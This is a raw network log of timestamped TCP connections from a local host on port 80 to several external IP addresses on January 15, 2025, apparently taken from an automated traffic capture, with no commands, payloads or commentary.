                                                                                                                          Jan 15, 2025 18:16:30.847628117 CET804998067.223.117.189192.168.2.4
                                                                                                                          Jan 15, 2025 18:16:30.847639084 CET804998067.223.117.189192.168.2.4
                                                                                                                          Jan 15, 2025 18:16:30.847650051 CET804998067.223.117.189192.168.2.4
                                                                                                                          Jan 15, 2025 18:16:30.847661018 CET804998067.223.117.189192.168.2.4
                                                                                                                          Jan 15, 2025 18:16:30.847671032 CET804998067.223.117.189192.168.2.4
                                                                                                                          Jan 15, 2025 18:16:30.847688913 CET4998080192.168.2.467.223.117.189
                                                                                                                          Jan 15, 2025 18:16:30.847714901 CET4998080192.168.2.467.223.117.189
                                                                                                                          Jan 15, 2025 18:16:30.848443031 CET804998067.223.117.189192.168.2.4
                                                                                                                          Jan 15, 2025 18:16:30.848457098 CET804998067.223.117.189192.168.2.4
                                                                                                                          Jan 15, 2025 18:16:30.848512888 CET4998080192.168.2.467.223.117.189
                                                                                                                          Jan 15, 2025 18:16:31.672377110 CET4998080192.168.2.467.223.117.189
                                                                                                                          Jan 15, 2025 18:16:32.691299915 CET4999980192.168.2.467.223.117.189
                                                                                                                          Jan 15, 2025 18:16:32.696208000 CET804999967.223.117.189192.168.2.4
                                                                                                                          Jan 15, 2025 18:16:32.696340084 CET4999980192.168.2.467.223.117.189
                                                                                                                          Jan 15, 2025 18:16:32.713108063 CET4999980192.168.2.467.223.117.189
                                                                                                                          Jan 15, 2025 18:16:32.717983961 CET804999967.223.117.189192.168.2.4
                                                                                                                          Jan 15, 2025 18:16:33.364851952 CET804999967.223.117.189192.168.2.4
                                                                                                                          Jan 15, 2025 18:16:33.364873886 CET804999967.223.117.189192.168.2.4
                                                                                                                          Jan 15, 2025 18:16:33.364886999 CET804999967.223.117.189192.168.2.4
                                                                                                                          Jan 15, 2025 18:16:33.364901066 CET804999967.223.117.189192.168.2.4
                                                                                                                          Jan 15, 2025 18:16:33.364914894 CET804999967.223.117.189192.168.2.4
                                                                                                                          Jan 15, 2025 18:16:33.364928961 CET804999967.223.117.189192.168.2.4
                                                                                                                          Jan 15, 2025 18:16:33.364943027 CET804999967.223.117.189192.168.2.4
                                                                                                                          Jan 15, 2025 18:16:33.364949942 CET804999967.223.117.189192.168.2.4
                                                                                                                          Jan 15, 2025 18:16:33.364969969 CET4999980192.168.2.467.223.117.189
                                                                                                                          Jan 15, 2025 18:16:33.365006924 CET804999967.223.117.189192.168.2.4
                                                                                                                          Jan 15, 2025 18:16:33.365022898 CET804999967.223.117.189192.168.2.4
                                                                                                                          Jan 15, 2025 18:16:33.365036011 CET4999980192.168.2.467.223.117.189
                                                                                                                          Jan 15, 2025 18:16:33.365125895 CET4999980192.168.2.467.223.117.189
                                                                                                                          Jan 15, 2025 18:16:33.369776011 CET804999967.223.117.189192.168.2.4
                                                                                                                          Jan 15, 2025 18:16:33.369821072 CET804999967.223.117.189192.168.2.4
                                                                                                                          Jan 15, 2025 18:16:33.369834900 CET804999967.223.117.189192.168.2.4
                                                                                                                          Jan 15, 2025 18:16:33.369848967 CET804999967.223.117.189192.168.2.4
                                                                                                                          Jan 15, 2025 18:16:33.369879007 CET4999980192.168.2.467.223.117.189
                                                                                                                          Jan 15, 2025 18:16:33.369914055 CET4999980192.168.2.467.223.117.189
                                                                                                                          Jan 15, 2025 18:16:33.455703974 CET804999967.223.117.189192.168.2.4
                                                                                                                          Jan 15, 2025 18:16:33.455760956 CET804999967.223.117.189192.168.2.4
                                                                                                                          Jan 15, 2025 18:16:33.455794096 CET804999967.223.117.189192.168.2.4
                                                                                                                          Jan 15, 2025 18:16:33.455828905 CET804999967.223.117.189192.168.2.4
                                                                                                                          Jan 15, 2025 18:16:33.455841064 CET4999980192.168.2.467.223.117.189
                                                                                                                          Jan 15, 2025 18:16:33.455866098 CET804999967.223.117.189192.168.2.4
                                                                                                                          Jan 15, 2025 18:16:33.455892086 CET4999980192.168.2.467.223.117.189
                                                                                                                          Jan 15, 2025 18:16:33.455900908 CET804999967.223.117.189192.168.2.4
                                                                                                                          Jan 15, 2025 18:16:33.456063986 CET4999980192.168.2.467.223.117.189
                                                                                                                          Jan 15, 2025 18:16:33.456129074 CET804999967.223.117.189192.168.2.4
                                                                                                                          Jan 15, 2025 18:16:33.456163883 CET804999967.223.117.189192.168.2.4
                                                                                                                          Jan 15, 2025 18:16:33.456197023 CET804999967.223.117.189192.168.2.4
                                                                                                                          Jan 15, 2025 18:16:33.456237078 CET4999980192.168.2.467.223.117.189
                                                                                                                          Jan 15, 2025 18:16:33.456581116 CET804999967.223.117.189192.168.2.4
                                                                                                                          Jan 15, 2025 18:16:33.456613064 CET804999967.223.117.189192.168.2.4
                                                                                                                          Jan 15, 2025 18:16:33.456629992 CET4999980192.168.2.467.223.117.189
                                                                                                                          Jan 15, 2025 18:16:33.456649065 CET804999967.223.117.189192.168.2.4
                                                                                                                          Jan 15, 2025 18:16:33.456681967 CET804999967.223.117.189192.168.2.4
                                                                                                                          Jan 15, 2025 18:16:33.456690073 CET4999980192.168.2.467.223.117.189
                                                                                                                          Jan 15, 2025 18:16:33.456717014 CET804999967.223.117.189192.168.2.4
                                                                                                                          Jan 15, 2025 18:16:33.456772089 CET4999980192.168.2.467.223.117.189
                                                                                                                          Jan 15, 2025 18:16:33.457181931 CET804999967.223.117.189192.168.2.4
                                                                                                                          Jan 15, 2025 18:16:33.457217932 CET804999967.223.117.189192.168.2.4
                                                                                                                          Jan 15, 2025 18:16:33.457304001 CET4999980192.168.2.467.223.117.189
                                                                                                                          Jan 15, 2025 18:16:34.220199108 CET4999980192.168.2.467.223.117.189
                                                                                                                          Jan 15, 2025 18:16:35.239001989 CET5001480192.168.2.467.223.117.189
                                                                                                                          Jan 15, 2025 18:16:35.243957996 CET805001467.223.117.189192.168.2.4
                                                                                                                          Jan 15, 2025 18:16:35.244136095 CET5001480192.168.2.467.223.117.189
                                                                                                                          Jan 15, 2025 18:16:35.260384083 CET5001480192.168.2.467.223.117.189
                                                                                                                          Jan 15, 2025 18:16:35.265289068 CET805001467.223.117.189192.168.2.4
                                                                                                                          Jan 15, 2025 18:16:35.265305042 CET805001467.223.117.189192.168.2.4
                                                                                                                          Jan 15, 2025 18:16:35.265326023 CET805001467.223.117.189192.168.2.4
                                                                                                                          Jan 15, 2025 18:16:35.265337944 CET805001467.223.117.189192.168.2.4
                                                                                                                          Jan 15, 2025 18:16:35.265372992 CET805001467.223.117.189192.168.2.4
                                                                                                                          Jan 15, 2025 18:16:35.265384912 CET805001467.223.117.189192.168.2.4
                                                                                                                          Jan 15, 2025 18:16:35.265455961 CET805001467.223.117.189192.168.2.4
                                                                                                                          Jan 15, 2025 18:16:35.265466928 CET805001467.223.117.189192.168.2.4
                                                                                                                          Jan 15, 2025 18:16:35.265480042 CET805001467.223.117.189192.168.2.4
                                                                                                                          Jan 15, 2025 18:16:35.922044039 CET805001467.223.117.189192.168.2.4
                                                                                                                          Jan 15, 2025 18:16:35.922209024 CET805001467.223.117.189192.168.2.4
                                                                                                                          Jan 15, 2025 18:16:35.922234058 CET805001467.223.117.189192.168.2.4
                                                                                                                          Jan 15, 2025 18:16:35.922249079 CET805001467.223.117.189192.168.2.4
                                                                                                                          Jan 15, 2025 18:16:35.922265053 CET805001467.223.117.189192.168.2.4
                                                                                                                          Jan 15, 2025 18:16:35.922278881 CET805001467.223.117.189192.168.2.4
                                                                                                                          Jan 15, 2025 18:16:35.922292948 CET805001467.223.117.189192.168.2.4
                                                                                                                          Jan 15, 2025 18:16:35.922307014 CET805001467.223.117.189192.168.2.4
                                                                                                                          Jan 15, 2025 18:16:35.922307014 CET5001480192.168.2.467.223.117.189
                                                                                                                          Jan 15, 2025 18:16:35.922319889 CET805001467.223.117.189192.168.2.4
                                                                                                                          Jan 15, 2025 18:16:35.922333002 CET5001480192.168.2.467.223.117.189
                                                                                                                          Jan 15, 2025 18:16:35.922337055 CET805001467.223.117.189192.168.2.4
                                                                                                                          Jan 15, 2025 18:16:35.922379017 CET5001480192.168.2.467.223.117.189
                                                                                                                          Jan 15, 2025 18:16:35.927172899 CET805001467.223.117.189192.168.2.4
                                                                                                                          Jan 15, 2025 18:16:35.927189112 CET805001467.223.117.189192.168.2.4
                                                                                                                          Jan 15, 2025 18:16:35.927205086 CET805001467.223.117.189192.168.2.4
                                                                                                                          Jan 15, 2025 18:16:35.927220106 CET805001467.223.117.189192.168.2.4
                                                                                                                          Jan 15, 2025 18:16:35.927237034 CET5001480192.168.2.467.223.117.189
                                                                                                                          Jan 15, 2025 18:16:35.927261114 CET5001480192.168.2.467.223.117.189
                                                                                                                          Jan 15, 2025 18:16:35.927520990 CET805001467.223.117.189192.168.2.4
                                                                                                                          Jan 15, 2025 18:16:35.969199896 CET5001480192.168.2.467.223.117.189
                                                                                                                          Jan 15, 2025 18:16:36.012813091 CET805001467.223.117.189192.168.2.4
                                                                                                                          Jan 15, 2025 18:16:36.012828112 CET805001467.223.117.189192.168.2.4
                                                                                                                          Jan 15, 2025 18:16:36.012841940 CET805001467.223.117.189192.168.2.4
                                                                                                                          Jan 15, 2025 18:16:36.012913942 CET805001467.223.117.189192.168.2.4
                                                                                                                          Jan 15, 2025 18:16:36.012975931 CET805001467.223.117.189192.168.2.4
                                                                                                                          Jan 15, 2025 18:16:36.012989998 CET805001467.223.117.189192.168.2.4
                                                                                                                          Jan 15, 2025 18:16:36.013005018 CET5001480192.168.2.467.223.117.189
                                                                                                                          Jan 15, 2025 18:16:36.013022900 CET805001467.223.117.189192.168.2.4
                                                                                                                          Jan 15, 2025 18:16:36.013037920 CET805001467.223.117.189192.168.2.4
                                                                                                                          Jan 15, 2025 18:16:36.013051033 CET5001480192.168.2.467.223.117.189
                                                                                                                          Jan 15, 2025 18:16:36.013051987 CET805001467.223.117.189192.168.2.4
                                                                                                                          Jan 15, 2025 18:16:36.013091087 CET5001480192.168.2.467.223.117.189
                                                                                                                          Jan 15, 2025 18:16:36.013906002 CET805001467.223.117.189192.168.2.4
                                                                                                                          Jan 15, 2025 18:16:36.013920069 CET805001467.223.117.189192.168.2.4
                                                                                                                          Jan 15, 2025 18:16:36.013936043 CET805001467.223.117.189192.168.2.4
                                                                                                                          Jan 15, 2025 18:16:36.013950109 CET805001467.223.117.189192.168.2.4
                                                                                                                          Jan 15, 2025 18:16:36.013953924 CET5001480192.168.2.467.223.117.189
                                                                                                                          Jan 15, 2025 18:16:36.013978958 CET5001480192.168.2.467.223.117.189
                                                                                                                          Jan 15, 2025 18:16:36.014379025 CET805001467.223.117.189192.168.2.4
                                                                                                                          Jan 15, 2025 18:16:36.014405012 CET805001467.223.117.189192.168.2.4
                                                                                                                          Jan 15, 2025 18:16:36.014420986 CET805001467.223.117.189192.168.2.4
                                                                                                                          Jan 15, 2025 18:16:36.014434099 CET5001480192.168.2.467.223.117.189
                                                                                                                          Jan 15, 2025 18:16:36.014463902 CET5001480192.168.2.467.223.117.189
                                                                                                                          Jan 15, 2025 18:16:36.766191959 CET5001480192.168.2.467.223.117.189
                                                                                                                          Jan 15, 2025 18:16:37.785120010 CET5001580192.168.2.467.223.117.189
                                                                                                                          Jan 15, 2025 18:16:37.790174961 CET805001567.223.117.189192.168.2.4
                                                                                                                          Jan 15, 2025 18:16:37.790271044 CET5001580192.168.2.467.223.117.189
                                                                                                                          Jan 15, 2025 18:16:37.800493956 CET5001580192.168.2.467.223.117.189
                                                                                                                          Jan 15, 2025 18:16:37.805269003 CET805001567.223.117.189192.168.2.4
                                                                                                                          Jan 15, 2025 18:16:38.398361921 CET805001567.223.117.189192.168.2.4
                                                                                                                          Jan 15, 2025 18:16:38.398422956 CET805001567.223.117.189192.168.2.4
                                                                                                                          Jan 15, 2025 18:16:38.398461103 CET805001567.223.117.189192.168.2.4
                                                                                                                          Jan 15, 2025 18:16:38.398478031 CET805001567.223.117.189192.168.2.4
                                                                                                                          Jan 15, 2025 18:16:38.398495913 CET805001567.223.117.189192.168.2.4
                                                                                                                          Jan 15, 2025 18:16:38.398528099 CET805001567.223.117.189192.168.2.4
                                                                                                                          Jan 15, 2025 18:16:38.398585081 CET805001567.223.117.189192.168.2.4
                                                                                                                          Jan 15, 2025 18:16:38.398614883 CET805001567.223.117.189192.168.2.4
                                                                                                                          Jan 15, 2025 18:16:38.398654938 CET805001567.223.117.189192.168.2.4
                                                                                                                          Jan 15, 2025 18:16:38.398699045 CET805001567.223.117.189192.168.2.4
                                                                                                                          Jan 15, 2025 18:16:38.398828030 CET5001580192.168.2.467.223.117.189
                                                                                                                          Jan 15, 2025 18:16:38.398828983 CET5001580192.168.2.467.223.117.189
                                                                                                                          Jan 15, 2025 18:16:38.398828983 CET5001580192.168.2.467.223.117.189
                                                                                                                          Jan 15, 2025 18:16:38.403788090 CET805001567.223.117.189192.168.2.4
                                                                                                                          Jan 15, 2025 18:16:38.403831005 CET805001567.223.117.189192.168.2.4
                                                                                                                          Jan 15, 2025 18:16:38.403846025 CET805001567.223.117.189192.168.2.4
                                                                                                                          Jan 15, 2025 18:16:38.403861046 CET805001567.223.117.189192.168.2.4
                                                                                                                          Jan 15, 2025 18:16:38.403975010 CET5001580192.168.2.467.223.117.189
                                                                                                                          Jan 15, 2025 18:16:38.404223919 CET5001580192.168.2.467.223.117.189
                                                                                                                          Jan 15, 2025 18:16:38.488970995 CET805001567.223.117.189192.168.2.4
                                                                                                                          Jan 15, 2025 18:16:38.488993883 CET805001567.223.117.189192.168.2.4
                                                                                                                          Jan 15, 2025 18:16:38.489010096 CET805001567.223.117.189192.168.2.4
                                                                                                                          Jan 15, 2025 18:16:38.489026070 CET805001567.223.117.189192.168.2.4
                                                                                                                          Jan 15, 2025 18:16:38.489120007 CET805001567.223.117.189192.168.2.4
                                                                                                                          Jan 15, 2025 18:16:38.489141941 CET805001567.223.117.189192.168.2.4
                                                                                                                          Jan 15, 2025 18:16:38.489151955 CET5001580192.168.2.467.223.117.189
                                                                                                                          Jan 15, 2025 18:16:38.489166975 CET805001567.223.117.189192.168.2.4
                                                                                                                          Jan 15, 2025 18:16:38.489183903 CET805001567.223.117.189192.168.2.4
                                                                                                                          Jan 15, 2025 18:16:38.489197016 CET805001567.223.117.189192.168.2.4
                                                                                                                          Jan 15, 2025 18:16:38.489401102 CET5001580192.168.2.467.223.117.189
                                                                                                                          Jan 15, 2025 18:16:38.490014076 CET805001567.223.117.189192.168.2.4
                                                                                                                          Jan 15, 2025 18:16:38.490030050 CET805001567.223.117.189192.168.2.4
                                                                                                                          Jan 15, 2025 18:16:38.490046978 CET805001567.223.117.189192.168.2.4
                                                                                                                          Jan 15, 2025 18:16:38.490056038 CET5001580192.168.2.467.223.117.189
                                                                                                                          Jan 15, 2025 18:16:38.490063906 CET805001567.223.117.189192.168.2.4
                                                                                                                          Jan 15, 2025 18:16:38.490082026 CET805001567.223.117.189192.168.2.4
                                                                                                                          Jan 15, 2025 18:16:38.490083933 CET5001580192.168.2.467.223.117.189
                                                                                                                          Jan 15, 2025 18:16:38.490123987 CET5001580192.168.2.467.223.117.189
                                                                                                                          Jan 15, 2025 18:16:38.490807056 CET805001567.223.117.189192.168.2.4
                                                                                                                          Jan 15, 2025 18:16:38.490822077 CET805001567.223.117.189192.168.2.4
                                                                                                                          Jan 15, 2025 18:16:38.490858078 CET5001580192.168.2.467.223.117.189
                                                                                                                          Jan 15, 2025 18:16:38.494214058 CET5001580192.168.2.467.223.117.189
                                                                                                                          Jan 15, 2025 18:16:38.499020100 CET805001567.223.117.189192.168.2.4
                                                                                                                          Jan 15, 2025 18:16:44.278690100 CET5001680192.168.2.4136.243.64.147
                                                                                                                          Jan 15, 2025 18:16:44.283473969 CET8050016136.243.64.147192.168.2.4
                                                                                                                          Jan 15, 2025 18:16:44.283576965 CET5001680192.168.2.4136.243.64.147
                                                                                                                          Jan 15, 2025 18:16:44.300544024 CET5001680192.168.2.4136.243.64.147
                                                                                                                          Jan 15, 2025 18:16:44.305315018 CET8050016136.243.64.147192.168.2.4
                                                                                                                          Jan 15, 2025 18:16:44.948040009 CET8050016136.243.64.147192.168.2.4
                                                                                                                          Jan 15, 2025 18:16:44.948216915 CET8050016136.243.64.147192.168.2.4
                                                                                                                          Jan 15, 2025 18:16:44.948287964 CET5001680192.168.2.4136.243.64.147
                                                                                                                          Jan 15, 2025 18:16:45.817058086 CET5001680192.168.2.4136.243.64.147
                                                                                                                          Jan 15, 2025 18:16:46.831890106 CET5001780192.168.2.4136.243.64.147
                                                                                                                          Jan 15, 2025 18:16:46.836854935 CET8050017136.243.64.147192.168.2.4
                                                                                                                          Jan 15, 2025 18:16:46.836930037 CET5001780192.168.2.4136.243.64.147
                                                                                                                          Jan 15, 2025 18:16:46.853456974 CET5001780192.168.2.4136.243.64.147
                                                                                                                          Jan 15, 2025 18:16:46.858283043 CET8050017136.243.64.147192.168.2.4
                                                                                                                          Jan 15, 2025 18:16:47.587686062 CET8050017136.243.64.147192.168.2.4
                                                                                                                          Jan 15, 2025 18:16:47.587707996 CET8050017136.243.64.147192.168.2.4
                                                                                                                          Jan 15, 2025 18:16:47.587759972 CET5001780192.168.2.4136.243.64.147
                                                                                                                          Jan 15, 2025 18:16:48.360838890 CET5001780192.168.2.4136.243.64.147
                                                                                                                          Jan 15, 2025 18:16:49.378446102 CET5001880192.168.2.4136.243.64.147
                                                                                                                          Jan 15, 2025 18:16:49.383239031 CET8050018136.243.64.147192.168.2.4
                                                                                                                          Jan 15, 2025 18:16:49.383333921 CET5001880192.168.2.4136.243.64.147
                                                                                                                          Jan 15, 2025 18:16:49.399667025 CET5001880192.168.2.4136.243.64.147
                                                                                                                          Jan 15, 2025 18:16:49.404493093 CET8050018136.243.64.147192.168.2.4
                                                                                                                          Jan 15, 2025 18:16:49.404504061 CET8050018136.243.64.147192.168.2.4
                                                                                                                          Jan 15, 2025 18:16:49.404546976 CET8050018136.243.64.147192.168.2.4
                                                                                                                          Jan 15, 2025 18:16:49.404555082 CET8050018136.243.64.147192.168.2.4
                                                                                                                          Jan 15, 2025 18:16:49.404562950 CET8050018136.243.64.147192.168.2.4
                                                                                                                          Jan 15, 2025 18:16:49.404766083 CET8050018136.243.64.147192.168.2.4
                                                                                                                          Jan 15, 2025 18:16:49.404773951 CET8050018136.243.64.147192.168.2.4
                                                                                                                          Jan 15, 2025 18:16:49.404783010 CET8050018136.243.64.147192.168.2.4
                                                                                                                          Jan 15, 2025 18:16:49.404792070 CET8050018136.243.64.147192.168.2.4
                                                                                                                          Jan 15, 2025 18:16:50.021580935 CET8050018136.243.64.147192.168.2.4
                                                                                                                          Jan 15, 2025 18:16:50.021627903 CET8050018136.243.64.147192.168.2.4
                                                                                                                          Jan 15, 2025 18:16:50.021785021 CET5001880192.168.2.4136.243.64.147
                                                                                                                          Jan 15, 2025 18:16:50.906929016 CET5001880192.168.2.4136.243.64.147
                                                                                                                          Jan 15, 2025 18:16:51.925566912 CET5001980192.168.2.4136.243.64.147
                                                                                                                          Jan 15, 2025 18:16:51.930701971 CET8050019136.243.64.147192.168.2.4
                                                                                                                          Jan 15, 2025 18:16:51.930807114 CET5001980192.168.2.4136.243.64.147
                                                                                                                          Jan 15, 2025 18:16:51.940855026 CET5001980192.168.2.4136.243.64.147
                                                                                                                          Jan 15, 2025 18:16:51.945905924 CET8050019136.243.64.147192.168.2.4
                                                                                                                          Jan 15, 2025 18:16:52.577630043 CET8050019136.243.64.147192.168.2.4
                                                                                                                          Jan 15, 2025 18:16:52.577696085 CET8050019136.243.64.147192.168.2.4
                                                                                                                          Jan 15, 2025 18:16:52.577931881 CET5001980192.168.2.4136.243.64.147
                                                                                                                          Jan 15, 2025 18:16:52.580904007 CET5001980192.168.2.4136.243.64.147
                                                                                                                          Jan 15, 2025 18:16:52.585691929 CET8050019136.243.64.147192.168.2.4
                                                                                                                          Jan 15, 2025 18:17:14.025420904 CET5002080192.168.2.447.83.1.90
                                                                                                                          Jan 15, 2025 18:17:14.030164003 CET805002047.83.1.90192.168.2.4
                                                                                                                          Jan 15, 2025 18:17:14.030237913 CET5002080192.168.2.447.83.1.90
                                                                                                                          Jan 15, 2025 18:17:14.136756897 CET5002080192.168.2.447.83.1.90
                                                                                                                          Jan 15, 2025 18:17:14.141606092 CET805002047.83.1.90192.168.2.4
                                                                                                                          Jan 15, 2025 18:17:15.641721964 CET5002080192.168.2.447.83.1.90
                                                                                                                          Jan 15, 2025 18:17:15.646804094 CET805002047.83.1.90192.168.2.4
                                                                                                                          Jan 15, 2025 18:17:15.646908998 CET5002080192.168.2.447.83.1.90
                                                                                                                          Jan 15, 2025 18:17:16.660129070 CET5002180192.168.2.447.83.1.90
                                                                                                                          Jan 15, 2025 18:17:16.665240049 CET805002147.83.1.90192.168.2.4
                                                                                                                          Jan 15, 2025 18:17:16.665328026 CET5002180192.168.2.447.83.1.90
                                                                                                                          Jan 15, 2025 18:17:16.682286978 CET5002180192.168.2.447.83.1.90
                                                                                                                          Jan 15, 2025 18:17:16.687052965 CET805002147.83.1.90192.168.2.4
                                                                                                                          Jan 15, 2025 18:17:18.094875097 CET805002147.83.1.90192.168.2.4
                                                                                                                          Jan 15, 2025 18:17:18.094913960 CET805002147.83.1.90192.168.2.4
                                                                                                                          Jan 15, 2025 18:17:18.095005989 CET5002180192.168.2.447.83.1.90
                                                                                                                          Jan 15, 2025 18:17:18.188359022 CET5002180192.168.2.447.83.1.90
                                                                                                                          Jan 15, 2025 18:17:19.207139015 CET5002280192.168.2.447.83.1.90
                                                                                                                          Jan 15, 2025 18:17:19.212013960 CET805002247.83.1.90192.168.2.4
                                                                                                                          Jan 15, 2025 18:17:19.212155104 CET5002280192.168.2.447.83.1.90
                                                                                                                          Jan 15, 2025 18:17:19.234355927 CET5002280192.168.2.447.83.1.90
                                                                                                                          Jan 15, 2025 18:17:19.239206076 CET805002247.83.1.90192.168.2.4
                                                                                                                          Jan 15, 2025 18:17:19.239217997 CET805002247.83.1.90192.168.2.4
                                                                                                                          Jan 15, 2025 18:17:19.239236116 CET805002247.83.1.90192.168.2.4
                                                                                                                          Jan 15, 2025 18:17:19.239245892 CET805002247.83.1.90192.168.2.4
                                                                                                                          Jan 15, 2025 18:17:19.239298105 CET805002247.83.1.90192.168.2.4
                                                                                                                          Jan 15, 2025 18:17:19.239353895 CET805002247.83.1.90192.168.2.4
                                                                                                                          Jan 15, 2025 18:17:19.239363909 CET805002247.83.1.90192.168.2.4
                                                                                                                          Jan 15, 2025 18:17:19.239425898 CET805002247.83.1.90192.168.2.4
                                                                                                                          Jan 15, 2025 18:17:19.239437103 CET805002247.83.1.90192.168.2.4
                                                                                                                          Jan 15, 2025 18:17:20.727809906 CET805002247.83.1.90192.168.2.4
                                                                                                                          Jan 15, 2025 18:17:20.727894068 CET805002247.83.1.90192.168.2.4
                                                                                                                          Jan 15, 2025 18:17:20.727967024 CET5002280192.168.2.447.83.1.90
                                                                                                                          Jan 15, 2025 18:17:20.750684023 CET5002280192.168.2.447.83.1.90
                                                                                                                          Jan 15, 2025 18:17:21.769707918 CET5002380192.168.2.447.83.1.90
                                                                                                                          Jan 15, 2025 18:17:21.774655104 CET805002347.83.1.90192.168.2.4
                                                                                                                          Jan 15, 2025 18:17:21.774790049 CET5002380192.168.2.447.83.1.90
                                                                                                                          Jan 15, 2025 18:17:21.785057068 CET5002380192.168.2.447.83.1.90
                                                                                                                          Jan 15, 2025 18:17:21.790827990 CET805002347.83.1.90192.168.2.4
                                                                                                                          Jan 15, 2025 18:17:23.413017035 CET805002347.83.1.90192.168.2.4
                                                                                                                          Jan 15, 2025 18:17:23.413090944 CET805002347.83.1.90192.168.2.4
                                                                                                                          Jan 15, 2025 18:17:23.413202047 CET5002380192.168.2.447.83.1.90
                                                                                                                          Jan 15, 2025 18:17:23.416060925 CET5002380192.168.2.447.83.1.90
                                                                                                                          Jan 15, 2025 18:17:23.420820951 CET805002347.83.1.90192.168.2.4
                                                                                                                          Jan 15, 2025 18:17:28.526999950 CET5002480192.168.2.484.32.84.32
                                                                                                                          Jan 15, 2025 18:17:28.531894922 CET805002484.32.84.32192.168.2.4
                                                                                                                          Jan 15, 2025 18:17:28.532565117 CET5002480192.168.2.484.32.84.32
                                                                                                                          Jan 15, 2025 18:17:28.550195932 CET5002480192.168.2.484.32.84.32
                                                                                                                          Jan 15, 2025 18:17:28.555058002 CET805002484.32.84.32192.168.2.4
                                                                                                                          Jan 15, 2025 18:17:29.165548086 CET805002484.32.84.32192.168.2.4
                                                                                                                          Jan 15, 2025 18:17:29.165649891 CET5002480192.168.2.484.32.84.32
                                                                                                                          Jan 15, 2025 18:17:30.063193083 CET5002480192.168.2.484.32.84.32
                                                                                                                          Jan 15, 2025 18:17:30.069128036 CET805002484.32.84.32192.168.2.4
                                                                                                                          Jan 15, 2025 18:17:31.082305908 CET5002580192.168.2.484.32.84.32
                                                                                                                          Jan 15, 2025 18:17:31.087100983 CET805002584.32.84.32192.168.2.4
                                                                                                                          Jan 15, 2025 18:17:31.087215900 CET5002580192.168.2.484.32.84.32
                                                                                                                          Jan 15, 2025 18:17:31.106359005 CET5002580192.168.2.484.32.84.32
                                                                                                                          Jan 15, 2025 18:17:31.111164093 CET805002584.32.84.32192.168.2.4
                                                                                                                          Jan 15, 2025 18:17:31.540544033 CET805002584.32.84.32192.168.2.4
                                                                                                                          Jan 15, 2025 18:17:31.540719032 CET5002580192.168.2.484.32.84.32
                                                                                                                          Jan 15, 2025 18:17:32.610280037 CET5002580192.168.2.484.32.84.32
                                                                                                                          Jan 15, 2025 18:17:32.615123034 CET805002584.32.84.32192.168.2.4
                                                                                                                          Jan 15, 2025 18:17:33.629163980 CET5002680192.168.2.484.32.84.32
                                                                                                                          Jan 15, 2025 18:17:34.208098888 CET805002684.32.84.32192.168.2.4
                                                                                                                          Jan 15, 2025 18:17:34.208353043 CET5002680192.168.2.484.32.84.32
                                                                                                                          Jan 15, 2025 18:17:34.225218058 CET5002680192.168.2.484.32.84.32
                                                                                                                          Jan 15, 2025 18:17:34.230355978 CET805002684.32.84.32192.168.2.4
                                                                                                                          Jan 15, 2025 18:17:34.230372906 CET805002684.32.84.32192.168.2.4
                                                                                                                          Jan 15, 2025 18:17:34.230390072 CET805002684.32.84.32192.168.2.4
                                                                                                                          Jan 15, 2025 18:17:34.230415106 CET805002684.32.84.32192.168.2.4
                                                                                                                          Jan 15, 2025 18:17:34.230479002 CET805002684.32.84.32192.168.2.4
                                                                                                                          Jan 15, 2025 18:17:34.230492115 CET805002684.32.84.32192.168.2.4
                                                                                                                          Jan 15, 2025 18:17:34.230616093 CET805002684.32.84.32192.168.2.4
                                                                                                                          Jan 15, 2025 18:17:34.230643034 CET805002684.32.84.32192.168.2.4
                                                                                                                          Jan 15, 2025 18:17:34.230782986 CET805002684.32.84.32192.168.2.4
                                                                                                                          Jan 15, 2025 18:17:34.666811943 CET805002684.32.84.32192.168.2.4
                                                                                                                          Jan 15, 2025 18:17:34.667021990 CET5002680192.168.2.484.32.84.32
                                                                                                                          Jan 15, 2025 18:17:35.735337019 CET5002680192.168.2.484.32.84.32
                                                                                                                          Jan 15, 2025 18:17:35.740170002 CET805002684.32.84.32192.168.2.4
                                                                                                                          Jan 15, 2025 18:17:36.754760981 CET5002780192.168.2.484.32.84.32
                                                                                                                          Jan 15, 2025 18:17:36.759906054 CET805002784.32.84.32192.168.2.4
                                                                                                                          Jan 15, 2025 18:17:36.759980917 CET5002780192.168.2.484.32.84.32
                                                                                                                          Jan 15, 2025 18:17:36.770253897 CET5002780192.168.2.484.32.84.32
                                                                                                                          Jan 15, 2025 18:17:36.775118113 CET805002784.32.84.32192.168.2.4
                                                                                                                          Jan 15, 2025 18:17:37.237879992 CET805002784.32.84.32192.168.2.4
                                                                                                                          Jan 15, 2025 18:17:37.237919092 CET805002784.32.84.32192.168.2.4
                                                                                                                          Jan 15, 2025 18:17:37.237932920 CET805002784.32.84.32192.168.2.4
                                                                                                                          Jan 15, 2025 18:17:37.238023043 CET805002784.32.84.32192.168.2.4
                                                                                                                          Jan 15, 2025 18:17:37.238034964 CET805002784.32.84.32192.168.2.4
                                                                                                                          Jan 15, 2025 18:17:37.238043070 CET5002780192.168.2.484.32.84.32
                                                                                                                          Jan 15, 2025 18:17:37.238095045 CET805002784.32.84.32192.168.2.4
                                                                                                                          Jan 15, 2025 18:17:37.238106966 CET805002784.32.84.32192.168.2.4
                                                                                                                          Jan 15, 2025 18:17:37.238117933 CET805002784.32.84.32192.168.2.4
                                                                                                                          Jan 15, 2025 18:17:37.238131046 CET805002784.32.84.32192.168.2.4
                                                                                                                          Jan 15, 2025 18:17:37.238140106 CET805002784.32.84.32192.168.2.4
                                                                                                                          Jan 15, 2025 18:17:37.238151073 CET5002780192.168.2.484.32.84.32
                                                                                                                          Jan 15, 2025 18:17:37.238184929 CET805002784.32.84.32192.168.2.4
                                                                                                                          Jan 15, 2025 18:17:37.238189936 CET5002780192.168.2.484.32.84.32
                                                                                                                          Jan 15, 2025 18:17:37.238230944 CET5002780192.168.2.484.32.84.32
                                                                                                                          Jan 15, 2025 18:17:37.243247032 CET5002780192.168.2.484.32.84.32
                                                                                                                          Jan 15, 2025 18:17:37.248821020 CET805002784.32.84.32192.168.2.4
                                                                                                                          Jan 15, 2025 18:17:42.324539900 CET5002880192.168.2.4213.171.195.105
                                                                                                                          Jan 15, 2025 18:17:42.329355955 CET8050028213.171.195.105192.168.2.4
                                                                                                                          Jan 15, 2025 18:17:42.329600096 CET5002880192.168.2.4213.171.195.105
                                                                                                                          Jan 15, 2025 18:17:42.351341009 CET5002880192.168.2.4213.171.195.105
                                                                                                                          Jan 15, 2025 18:17:42.356175900 CET8050028213.171.195.105192.168.2.4
                                                                                                                          Jan 15, 2025 18:17:42.949337006 CET8050028213.171.195.105192.168.2.4
